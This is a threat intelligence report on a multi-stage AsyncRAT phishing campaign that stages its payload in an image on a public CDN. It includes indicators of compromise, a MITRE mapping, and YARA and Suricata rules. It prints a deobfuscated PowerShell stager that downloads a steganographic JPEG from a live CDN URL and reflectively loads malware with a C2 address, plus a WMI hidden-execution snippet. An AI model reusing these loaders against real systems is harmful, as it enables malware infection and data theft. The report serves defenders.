medium🎣Phishing

investigatedMarch 16, 2026publishedMarch 16, 2026

HackForums Actor "gigajew" Caught Red-Handed: AsyncRAT Campaign Uses Cloudinary CDN Steganography and 7-Month-Old Bulletproof Infrastructure

#phishing#asyncrat#c2#apt#spearphishing

TL;DR

A four-stage AsyncRAT campaign abuses Cloudinary's image CDN to hide a .NET loader inside a JPEG, then drops a full-featured RAT from a bulletproof Windows VPS in Amsterdam. The developer left their HackForums username -- gigajew -- compiled directly into the loader's .NET namespace. The same C2 IP was running German parcel phishing seven months ago, proving sustained criminal infrastructure reuse that most threat feeds have missed entirely.

Why This Matters

Most crimeware investigations end at "it's AsyncRAT" and a list of hashes. This one goes further because the operator made three critical mistakes that expose the entire operation:

Direct attribution baked into the binary. The Stage 2 .NET loader assembly contains the namespace HackForums.gigajew.x64. That is not a generic builder artifact. That is a developer's forum handle, compiled into every sample they distribute. Every downstream operator running this loader is carrying the author's fingerprint.
CDN steganography for payload staging. The campaign hides a 1.1 MB .NET assembly inside a fake JPEG hosted on Cloudinary (account dn6bpc2yo). Cloudinary is a legitimate, widely-trusted image CDN. Most corporate proxies, firewalls, and even EDR products will not flag HTTPS downloads from res.cloudinary.com. This is not novel, but it remains devastatingly effective.
Seven months of infrastructure reuse on one IP. The C2 server at 91[.]92[.]242[.]219 was hosting a Hermes (German parcel delivery) phishing page under the domain online-renew[.]one back in August 2024. That same IP now serves AsyncRAT payloads. Same server, same bulletproof host, different campaign. The actor is comfortable and has not been disrupted.

This post walks through the full four-stage infection chain, the malware's capabilities, the infrastructure behind it, and what defenders need to do about it right now.

The Lure: A JScript File Pretending to Be a PDF

The campaign begins with a spearphishing email carrying a file named:

met-tech_pricing_request_product_specifications_drawings_031620260000000_pdf.js

The filename is carefully crafted. It references "met-tech pricing request" and "product specifications" -- language targeting manufacturing, engineering, or procurement teams. The _pdf suffix before .js is a classic double-extension trick designed to fool users who have file extensions hidden in Windows Explorer. They see a long filename ending in "pdf" and assume it is a document.

It is not a document. It is a 32 KB JScript file that executes the moment it is double-clicked.

Sample hashes:

Algorithm	Hash
SHA256	`57c5c7a34d11c1135ab38c3612030377345685347f49c1b2a626106cbe4385bd`
SHA1	`90c29d32d2390e1ad1a670a5b097c361b73aab22`
MD5	`966d8da6422ee21e23520f869212cd87`

Stage 0: JScript Dropper with WMI-Based Execution

The JScript dropper uses two obfuscation layers to slow down analysis:

Junk padding. Approximately 182 lines of dead code at the top and bottom of the file consist of nothing but this.raingear += "Altissimo" repeated endlessly. This is designed to waste the time of anyone scrolling through the file manually and to inflate the file size past quick-scan thresholds.

String splitting with noise tokens. Every meaningful string in the script is broken apart with two delimiter tokens -- "Altissimo" and "ranki" -- inserted between each real character. At runtime, the script calls .split().join() to strip the noise and reassemble the actual strings.

After deobfuscation, the key variables reveal:

Variable	Deobfuscated Value
`louvredService`	`winmgmts:root\cimv2`
`louvredStartup`	`Win32_ProcessStartup`
`louvredProcess`	`Win32_Process`
`insinuateth`	`powershell.exe -NoProfile -WindowStyle Hidden -Command "[payload]"`

The execution mechanism is notable. Rather than calling WScript.Shell.Run() or ShellExecute -- which most EDR products hook aggressively -- the dropper uses WMI process creation:

// Deobfuscated execution flow
var svc = GetObject("winmgmts:root\\cimv2");
var startup = svc.Get("Win32_ProcessStartup").SpawnInstance_();
startup.ShowWindow = 0;  // Hidden window
svc.Get("Win32_Process").Create(powershellCommand, null, startup);

WMI spawns processes through the WMI Provider Host (WmiPrvSE.exe), not through the standard CreateProcess API. This breaks the expected parent-child process relationship that many detection rules rely on. The PowerShell process appears to be spawned by WmiPrvSE.exe, not by WScript.exe, which can cause alert rules keyed on "script host spawning PowerShell" to miss the event entirely.

The JScript file also contains a 3,022-character hex-encoded payload in the punkie variable, with ranki delimiters between every hex digit pair. After stripping delimiters and decoding, this yields the Stage 1 PowerShell script.

Stage 1: PowerShell Downloads a Weaponized JPEG from Cloudinary

The decoded PowerShell payload is where the campaign gets interesting. Here it is in full, deobfuscated:

# Stage 1 -- CDN Steganography Downloader
$url = 'https://res.cloudinary.com/dn6bpc2yo/image/upload/v1773640942/optimized_MSI_eheqzz.jpg'
$wc = New-Object Net.WebClient
$data = $wc.DownloadData($url)
$text = [Text.Encoding]::UTF8.GetString($data)

# Extract payload between steganographic markers
$start = $text.IndexOf('IN-')
$end   = $text.LastIndexOf('-in1')
if ($start -eq -1 -or $end -eq -1) { return }

$encoded = $text.Substring($start + 3, $end - $start - 3)

# Decode: replace '#' with 'A', reverse the string, base64 decode
$chars = $encoded.Replace('#', 'A').ToCharArray()
[Array]::Reverse($chars)
$reversed = $chars -join ''
[byte[]]$assembly = [Convert]::FromBase64String($reversed)

# Reflective load -- no file touches disk
$domain = [AppDomain]::CurrentDomain.Load($assembly)

# Execute Fiber loader with C2 configuration
$args = @(
    'http://91.92.242.219/img_230249.png',   # Stage 3 URL
    '',
    'C:\Users\Public\Downloads\',             # Drop path
    'Name_File',                              # Filename
    'CasPol',                                 # LOLBIN target
    '', 'CasPol', '',
    'URL',                                    # Download mode
    'C:\Users\Public\Downloads\', 'Name_File', 'js',
    '1', '',
    'Task_Name',                              # Sched task name
    '1', '', ''
)
$type   = $domain.GetType('Fiber.Program')
$method = $type.GetMethod('Main')
$method.Invoke($null, [object[]]$args)

Several things stand out here.

Cloudinary as a Payload CDN

The Stage 2 .NET loader is embedded inside a real JPEG image hosted on Cloudinary's CDN (res[.]cloudinary[.]com). Cloudinary is a legitimate SaaS platform used by thousands of websites for image optimization and delivery. Traffic to res.cloudinary.com over HTTPS is:

Encrypted (TLS), so content inspection at the proxy is difficult
From a trusted, high-reputation domain, so it passes URL filtering
On a CDN with valid certificates, so certificate pinning is not an issue
Indistinguishable from normal web browsing at the network level

The attacker's Cloudinary account ID is dn6bpc2yo. The carrier image is 2.87 MB, with 1,554,432 characters of encoded payload inserted between IN- and -in1 text markers inside the file. The image itself renders normally -- it looks like a legitimate photo if opened in an image viewer.

The Decoding Algorithm

The encoding scheme is simple but effective:

Extract the text between IN- and -in1 markers
Replace all # characters with A (character substitution to break base64 pattern matching)
Reverse the entire string
Base64 decode the result

This produces a 1,165,824-byte .NET DLL (the Fiber loader), which is loaded directly into memory via [AppDomain]::CurrentDomain.Load(). No file is written to disk at this stage. The loader exists only in process memory, evading file-based scanning entirely.

Stage 2: The Fiber Loader and the HackForums.gigajew Namespace

SHA256: 240068f98bd3e3213351ebdac3a0e9657f9a17506e43425ea3ed19f14e17cf21 MD5: 362a05c05433d060383c4ba383d00839 Size: 1,165,824 bytes (1.1 MB) Type: PE32 .NET DLL (x86), CLR v4.0.30319

The Attribution Artifact

When the Fiber loader assembly is parsed, the .NET metadata reveals these type definitions:

Namespace: HackForums.gigajew
  Type: HackForums.gigajew.x64

Namespace: Fiber
  Type: Fiber.Program

Namespace: (root)
  Type: VirtualMachineDetector
  Type: BiosCharacteristics

The HackForums.gigajew.x64 type is the smoking gun. This is a compiled .NET namespace, meaning it was defined in the source code's project structure. The developer who built the Fiber loader used HackForums.gigajew as their root namespace -- directly embedding their HackForums handle into every compiled binary they distribute.

This is a common OPSEC failure in the crimeware ecosystem. Developers build tools under their forum identity, distribute them (or sell them), and every customer's deployed sample carries the author's fingerprint. It is the digital equivalent of a burglar leaving a business card at the crime scene.

What the Fiber Loader Does

Based on the arguments passed from Stage 1, Fiber performs the following:

Downloads Stage 3 from hxxp://91[.]92[.]242[.]219/img_230249.png over plain HTTP
Drops the payload to C:\Users\Public\Downloads\
Executes via CasPol.exe -- CasPol.exe (Code Access Security Policy tool) is a legitimate Microsoft .NET Framework binary. Using it to load and execute arbitrary assemblies is a well-documented LOLBIN (Living Off the Land Binary) technique that can bypass application allowlisting policies
Creates a Scheduled Task for persistence (task name is parameterized per deployment)
Sets a Registry Run key (flagRegStartup) as a backup persistence mechanism

Two independent persistence mechanisms ensure the RAT survives reboots even if one method is cleaned.

The loader also bundles Microsoft.Win32.TaskScheduler v2.12 (from the open-source dahall/taskscheduler project) for reliable scheduled task creation across Windows versions.

VM Detection

The VirtualMachineDetector class queries BIOS characteristics via WMI to detect virtualized environments:

BIOS_ROM_is_socketed -- physical hardware indicator
BIOS_is_Upgradeable_Flash -- flash BIOS check
BIOS_Characteristics_Not_Supported -- common in VMs
BIOS_shadowing_is_allowed -- hypervisor detection

If the environment appears to be a sandbox or VM, the loader can terminate early, preventing automated analysis from seeing the final payload.

Stage 3: AsyncRAT -- The Final Payload

SHA256: 961c0768778cc40cc684b644fea8b09b1ec373e640ce530659198a5fa4ad099e MD5: 8c75289cafeabfbbf96d0b338cd7ad76 Size: 56,294 bytes (55 KB) Type: VB.NET executable (PE32)

The Stage 3 carrier is itself another steganographic JPEG -- a 3840x2160 photograph created with Adobe Photoshop CC 2019 (metadata timestamp 2022-05-05). The RAT payload is appended after the JPEG's FFD9 end-of-image marker as 77,075 bytes of encoded data, delimited by INICIO (start) and FIM (end) markers. These are Portuguese/Spanish words, an interesting linguistic artifact that may indicate the actor's language background or simply reflect code borrowed from a Portuguese-speaking developer's toolkit.

The same decoding algorithm applies: replace # with A, reverse, base64 decode.

Configuration Keys

The extracted RAT contains the canonical AsyncRAT configuration structure:

Config Key	Purpose
`Host`	C2 server address (encrypted at runtime)
`Port`	C2 communication port (encrypted at runtime)
`KEY`	AES encryption key for C2 traffic
`Sleep`	Beacon/reconnection interval
`USBNM`	USB propagation filename
`LoggerPath`	Keylogger output file path
`Mutex`	`{236d7778-f364-479f-bacf-8d0c9c30df57}`

These fields are unique to the AsyncRAT family and its documented forks (originally from the NYAN-x-CAT/AsyncRAT-C-Sharp project), confirming the family attribution with high confidence.

Capabilities

The RAT is fully featured:

Capability	Implementation Evidence
Keylogging	`LowLevelKeyboardProc`, `WM_KEYDOWN`, `GetKeyboardLayout`, `ToUnicodeEx`
Active window tracking	`GetActiveWindowTitle`, `GetForegroundWindow`
Screen capture	`Screen`, `get_PrimaryScreen`
Webcam/microphone	`capGetDriverDescriptionA`
AES-encrypted C2	`AlgorithmAES`, `AES_Decryptor`, `CreateDecryptor`, `CipherMode`
Reverse TCP shell	`BeginConnect`, `BeginReceive`, `EndSend`
Shell command execution	`Shell`, `ProcessStartInfo`, `set_UseShellExecute`
Anti-sleep/idle	`ES_CONTINUOUS`, `ES_SYSTEM_REQUIRED`
AV detection	`Antivirus` class
System reconnaissance	`ComputerInfo`, `DriveInfo`, `get_TotalPhysicalMemory`, `get_UserName`
Plugin/module system	`Plugin`, `Monitoring` -- modular extensibility for post-compromise tools
Data compression	`Compress` -- likely for exfiltration efficiency
Heartbeat	`ActivatePong`, `Pong` -- connection keepalive

The plugin system is particularly concerning. It means the operator can push additional capability modules to infected hosts after initial compromise -- keylogger upgrades, credential harvesting modules, lateral movement tools -- without deploying a new RAT binary.

The Full Kill Chain

 DELIVERY                    Email attachment (.js masquerading as .pdf)
    |
    v
 STAGE 0 [JScript]          WScript.exe --> WMI Win32_Process.Create()
    |                        --> powershell.exe -NoProfile -WindowStyle Hidden
    v
 STAGE 1 [PowerShell]       HTTPS GET res.cloudinary.com/dn6bpc2yo/...jpg
    |                        Extract between IN- / -in1 markers
    |                        Decode: # -> A, reverse, base64
    |                        Reflective .NET assembly load (fileless)
    v
 STAGE 2 [Fiber Loader]     HTTP GET 91.92.242.219/img_230249.png
    |  (.NET, HackForums     Extract between INICIO / FIM markers
    |   .gigajew namespace)  Same decode algorithm
    |                        Drop to C:\Users\Public\Downloads\
    |                        Execute via CasPol.exe (LOLBIN)
    |                        Persist: Scheduled Task + Registry Run key
    v
 STAGE 3 [AsyncRAT]         AES-encrypted reverse TCP to C2
    |  (VB.NET)              Keylogging, screen capture, webcam
    |                        Plugin system for modular post-compromise
    |                        Heartbeat keepalive (Pong)
    v
 EXFILTRATION               Keystroke logs, screenshots, system info
                             Compressed and AES-encrypted to C2

C2 Infrastructure: Omegatech Bulletproof Hosting

Primary C2: 91[.]92[.]242[.]219

Field	Value
IP	`91[.]92[.]242[.]219`
Location	Amsterdam, Netherlands
ISP	Neterra Ltd.
Organization	Omegatech LTD
ASN	AS202412
Transit	AS2914 (NTT America)
WHOIS Registrant	Omegatech LTD, House of Francis Room 303, Ile du Port, Mahe, Seychelles
Abuse Contact	abuse@omegatech[.]sc
RIPE Bloc Created	2025-09-12
RIPE Org Created	2026-01-05
NetBIOS Hostname	`WIN-7N1FIECL6IC`
MAC Prefix	`00:50:56` (VMware)

Exposed services (Shodan, last indexed 2026-03-14):

Port	Service	Note
80	HTTP	Serves Stage 3 payload
135	MSRPC	Microsoft RPC Endpoint Mapper
137	NetBIOS-NS	Name Service
139	NetBIOS-SSN	Session Service
445	SMB v2	NTLM authentication enabled
5985	WinRM	Windows Remote Management -- exposed to the internet

This is a Windows Server VPS running on VMware infrastructure at a bulletproof hosting provider. The WIN-7N1FIECL6IC hostname is an auto-generated Windows Server name, consistent with a fresh VPS deployment that was never renamed.

The exposed WinRM service (port 5985) is a significant OPSEC failure by the operator. WinRM allows remote PowerShell execution and is a common target for brute-force attacks. Exposing it on a C2 server is an invitation for other actors to compromise the same box.

The open SMB service with NTLM authentication is equally reckless. It leaks the NetBIOS hostname and domain information to anyone who connects.

Omegatech: A Seychelles Shell for Bulletproof Hosting

Omegatech LTD is registered at "House of Francis Room 303, Ile du Port, Mahe, Seychelles" -- a well-known address used by offshore shell companies. The RIPE organization object (ORG-OL329-RIPE) was created in January 2026, and the 91.92.242.0/24 prefix was allocated in September 2025. This is textbook bulletproof hosting infrastructure:

Offshore incorporation in a jurisdiction with minimal cooperation on abuse complaints
Recently allocated IP space with no historical reputation
NTT America (AS2914) as upstream transit -- a major Tier 1 carrier that provides connectivity without content oversight
The /24 subnet contains 917 active hosts, suggesting a dense allocation serving multiple criminal operations

Abuse reports to abuse@omegatech[.]sc are unlikely to result in takedown action. This infrastructure will need to be addressed through upstream transit providers or law enforcement channels.

Historical Domain: online-renew[.]one

In August 2024, the domain online-renew[.]one resolved to the same IP address (91[.]92[.]242[.]219) and was serving a Hermes parcel delivery phishing page ("Hermes Paketversand") targeting German-speaking victims. A Let's Encrypt certificate for the domain was issued on 2024-08-07, and the page was captured by urlscan.io (scan ID: ec525365-cc73-4cc5-af58-fa1d93b89db9).

This proves the actor has operated this server for at least seven months, pivoting from phishing to RAT delivery. The infrastructure reuse is a strong clustering indicator -- any other domains or campaigns tied to this IP or this Omegatech allocation are likely operated by the same actor or the same customer of the bulletproof host.

Operational Timeline

Date	Event
2024-08-07	Let's Encrypt cert issued for `online-renew[.]one`; Hermes phishing page live at `91[.]92[.]242[.]219`
2025-09-12	`91.92.242.0/24` RIPE allocation registered to Omegatech
2026-01-05	Omegatech LTD organization object created in RIPE
2026-01-21	RIPE records last modified
2026-03-14	Shodan indexes `91[.]92[.]242[.]219` -- C2 active with ports 80, 135, 139, 445, 5985
2026-03-16	AsyncRAT sample first seen; uploaded to analysis platforms

Actor Profile: gigajew (HackForums)

Attribution Confidence: HIGH

The HackForums.gigajew namespace is compiled into the .NET assembly. This is not a runtime artifact, a comment, or a metadata field that could be spoofed without access to the source code. It is a namespace declaration in the original C# project, meaning the developer's build environment had this as the project root namespace. To change it, you would need to modify the source code and recompile.

Attribute	Assessment
Platform	HackForums (underground crimeware forum)
Handle	`gigajew`
Product	"Fiber" loader (.NET, reflective loading, LOLBIN execution, dual persistence)
Infrastructure	Omegatech bulletproof hosting (Seychelles entity, NL IP space, AS202412)
Campaigns	German parcel phishing (2024), AsyncRAT delivery (2026)
Targeting	Manufacturing/engineering sector (based on lure content)
Language clues	Portuguese/Spanish markers (`INICIO`/`FIM`) in Stage 3 encoding -- possibly borrowed code

OPSEC Failures

Forum handle in compiled namespace -- the single most damaging mistake. Every sample distributed with the Fiber loader carries the author's identity.
Seven months of IP reuse -- the same VPS has served phishing and RAT payloads since August 2024 without rotation.
WinRM exposed to the internet -- port 5985 open on the C2 server invites third-party compromise.
Plain HTTP for Stage 3 delivery -- hxxp://91[.]92[.]242[.]219/img_230249.png is unencrypted, making payload downloads visible in any proxy or network monitoring log.
Single Cloudinary account reuse -- the dn6bpc2yo account ID enables clustering of all samples that pull from the same CDN bucket.

MITRE ATT&CK Mapping

Tactic	Technique	ID	Stage
Initial Access	Spearphishing Attachment	T1566.001	Delivery
Defense Evasion	Masquerading: Double File Extension	T1036.007	Stage 0
Execution	JScript/VBScript Interpreter	T1059.005	Stage 0
Execution	Windows Management Instrumentation	T1047	Stage 0
Execution	PowerShell	T1059.001	Stage 1
Defense Evasion	Obfuscated Files or Information	T1027	Stages 0-3
Defense Evasion	Steganography	T1027.003	Stages 1-3
Defense Evasion	Deobfuscate/Decode Files	T1140	Stages 1-3
Command and Control	Web Service	T1102	Stage 1
Command and Control	Ingress Tool Transfer	T1105	Stages 1-2
Defense Evasion	Signed Binary Proxy Execution	T1218	Stage 2
Persistence	Scheduled Task	T1053.005	Stage 2
Persistence	Registry Run Keys	T1547.001	Stage 2
Defense Evasion	Virtualization/Sandbox Evasion	T1497.001	Stage 2
Discovery	Security Software Discovery	T1518.001	Stage 3
Collection	Keylogging	T1056.001	Stage 3
Collection	Screen Capture	T1113	Stage 3
Collection	Video Capture	T1125	Stage 3
Discovery	System Information Discovery	T1082	Stage 3
Command and Control	Encrypted Channel: AES	T1573.001	Stage 3

Complete IOC Table

File Indicators

SHA256	MD5	Description
`57c5c7a34d11c1135ab38c3612030377345685347f49c1b2a626106cbe4385bd`	`966d8da6422ee21e23520f869212cd87`	Stage 0 -- JScript dropper
`240068f98bd3e3213351ebdac3a0e9657f9a17506e43425ea3ed19f14e17cf21`	`362a05c05433d060383c4ba383d00839`	Stage 2 -- Fiber .NET loader (HackForums.gigajew)
`961c0768778cc40cc684b644fea8b09b1ec373e640ce530659198a5fa4ad099e`	`8c75289cafeabfbbf96d0b338cd7ad76`	Stage 3 -- AsyncRAT variant (VB.NET)

Network Indicators

Type	Indicator	Context
IP	`91[.]92[.]242[.]219`	Primary C2 and Stage 3 payload server
URL	`hxxp://91[.]92[.]242[.]219/img_230249.png`	Stage 3 steganographic payload
URL	`hxxps://res[.]cloudinary[.]com/dn6bpc2yo/image/upload/v1773640942/optimized_MSI_eheqzz.jpg`	Stage 2 CDN-hosted steganographic payload
Domain	`online-renew[.]one`	Historical domain on same C2 IP (Hermes phishing, Aug 2024)
CDN Account	`dn6bpc2yo`	Cloudinary account used for payload staging
ASN	AS202412	Omegatech LTD bulletproof hosting

Host-Based Indicators

Type	Indicator	Context
Mutex	`{236d7778-f364-479f-bacf-8d0c9c30df57}`	AsyncRAT single-instance mutex
File Path	`C:\Users\Public\Downloads\`	Stage 3 drop directory
LOLBIN	`CasPol.exe`	Used for Stage 3 execution
.NET Namespace	`HackForums.gigajew`	Attribution artifact in Fiber loader
.NET Class	`Fiber.Program`	Loader entrypoint
Persistence	Scheduled Task (parameterized name)	Persistence mechanism 1
Persistence	Registry Run key (`flagRegStartup`)	Persistence mechanism 2
NetBIOS	`WIN-7N1FIECL6IC`	C2 server hostname

Detection Guidance

Immediate Blocklist Actions

Block 91[.]92[.]242[.]219 at your perimeter firewall, DNS sinkhole, and EDR network policy
Add the Cloudinary account dn6bpc2yo to your proxy/CASB monitoring. If your proxy supports URL path inspection, alert on any traffic to res[.]cloudinary[.]com/dn6bpc2yo/
Hunt for the mutex {236d7778-f364-479f-bacf-8d0c9c30df57} across all endpoints using your EDR's live query capability
Search for files recently created in C:\Users\Public\Downloads\ by CasPol.exe

Process-Based Detection Rules

These behavioral detections will catch this campaign and similar attack chains:

WScript/CScript spawning PowerShell with -WindowStyle Hidden -- this is almost never legitimate
WMI Win32_Process.Create() calls originating from script host processes -- WMI execution from JScript/VBScript is a strong malware signal
CasPol.exe spawning child processes or loading non-Microsoft assemblies -- CasPol has no legitimate reason to execute arbitrary code in modern environments
Scheduled task creation from PowerShell or WMI -- especially with tasks pointing to C:\Users\Public\

Suricata Rules

alert http $HOME_NET any -> $EXTERNAL_NET any (
    msg:"BGI - Fiber Loader Stage 3 Download (img_230249.png)";
    flow:established,to_server;
    content:"/img_230249.png"; http_uri;
    reference:url,intel.breakglass.tech;
    classtype:trojan-activity;
    sid:9000100; rev:1;
)

alert http $HOME_NET any -> $EXTERNAL_NET any (
    msg:"BGI - Cloudinary Steganographic Payload (dn6bpc2yo account)";
    flow:established,to_server;
    content:"res.cloudinary.com"; http_host;
    content:"/dn6bpc2yo/"; http_uri;
    reference:url,intel.breakglass.tech;
    classtype:trojan-activity;
    sid:9000101; rev:1;
)

alert http $HOME_NET any -> $EXTERNAL_NET any (
    msg:"BGI - Steganographic Payload Markers (IN- / INICIO)";
    flow:established,to_server;
    content:"91.92.242.219"; http_host;
    reference:url,intel.breakglass.tech;
    classtype:trojan-activity;
    sid:9000102; rev:1;
)

YARA Rule

rule Fiber_Loader_HackForums_Gigajew {
    meta:
        author = "GHOST - Breakglass Intelligence"
        date = "2026-03-16"
        description = "Detects the Fiber .NET loader with HackForums.gigajew namespace"
        hash = "240068f98bd3e3213351ebdac3a0e9657f9a17506e43425ea3ed19f14e17cf21"
        tlp = "WHITE"
        reference = "https://intel.breakglass.tech"

    strings:
        $ns1 = "HackForums.gigajew" ascii wide
        $ns2 = "Fiber.Program" ascii wide
        $vm1 = "VirtualMachineDetector" ascii wide
        $vm2 = "BiosCharacteristics" ascii wide
        $sched = "Microsoft.Win32.TaskScheduler" ascii wide
        $flag = "flagRegStartup" ascii wide

    condition:
        uint16(0) == 0x5A4D and
        filesize < 5MB and
        $ns1 and
        2 of ($ns2, $vm1, $vm2, $sched, $flag)
}

rule AsyncRAT_Stego_Dropper_JScript {
    meta:
        author = "GHOST - Breakglass Intelligence"
        date = "2026-03-16"
        description = "Detects JScript dropper using Altissimo/ranki obfuscation pattern"
        hash = "57c5c7a34d11c1135ab38c3612030377345685347f49c1b2a626106cbe4385bd"
        tlp = "WHITE"
        reference = "https://intel.breakglass.tech"

    strings:
        $junk = "this.raingear" ascii
        $delim1 = "Altissimo" ascii
        $delim2 = "ranki" ascii
        $wmi = "winmgmts" ascii
        $proc = "Win32_Process" ascii

    condition:
        filesize < 100KB and
        all of them
}

Abuse Reporting

Cloudinary: Report account dn6bpc2yo as hosting malware payloads to security@cloudinary.com. Provide the full URL and SHA256 of the decoded payload. Cloudinary has historically been responsive to abuse reports.
Omegatech: abuse@omegatech[.]sc -- this is bulletproof hosting. Expect no response. Document the report for your records.
RIPE NCC: Contact CA12141-RIPE (abuse contact for 91.92.242.0/24). RIPE can escalate to the upstream transit provider (NTT/AS2914) if the LIR is non-responsive.
NTT (AS2914): As the upstream transit provider, NTT can null-route the prefix if Omegatech refuses to act. Contact NTT's abuse team with evidence.

So What? Takeaways for Defenders

If you work in manufacturing, engineering, or procurement, this campaign is targeting you specifically. The lure document references "met-tech pricing request" and "product specifications" -- language designed to blend into the daily email flow of someone who handles vendor quotes and technical drawings. Train your teams to verify .js attachments are never legitimate quote documents.

If you allow Cloudinary traffic unmonitored, you have a blind spot. This campaign demonstrates that legitimate CDN services are actively being weaponized for payload delivery. The fix is not to block Cloudinary entirely -- that would break countless legitimate websites. The fix is to inspect the content: monitor for unusually large image downloads, alert on Cloudinary URLs in PowerShell download cradles, and consider SSL inspection for high-risk user populations.

If you are not monitoring CasPol.exe execution, add it to your LOLBIN watchlist immediately. CasPol is a .NET Framework utility with no legitimate use in modern enterprise environments. Any execution of CasPol that loads an assembly or spawns a child process is almost certainly malicious.

If you rely solely on IP/domain blocklists, you are losing this fight. Stage 1 of this chain downloads from res.cloudinary.com -- a domain you cannot block. Stage 3 downloads from a bare IP over HTTP -- trivially rotatable. Behavioral detection (WMI process creation, hidden PowerShell, CasPol abuse, steganographic marker patterns) is more durable than IOC-based blocking.

The broader pattern: a HackForums-level actor is running multi-stage, CDN-abusing, steganography-based infection chains with dual persistence and AES-encrypted C2. This is not nation-state sophistication, but it is well beyond "script kiddie." The crimeware ecosystem continues to raise the bar, and defenders who dismiss HackForums operators as unsophisticated are underestimating the threat.

This investigation was conducted by GHOST, Breakglass Intelligence's automated threat analysis engine. IOCs, YARA rules, and Suricata signatures from this report are available for download. If you have additional samples or infrastructure tied to the gigajew actor or the Fiber loader, contact us.

Breakglass Intelligence -- intel.breakglass.tech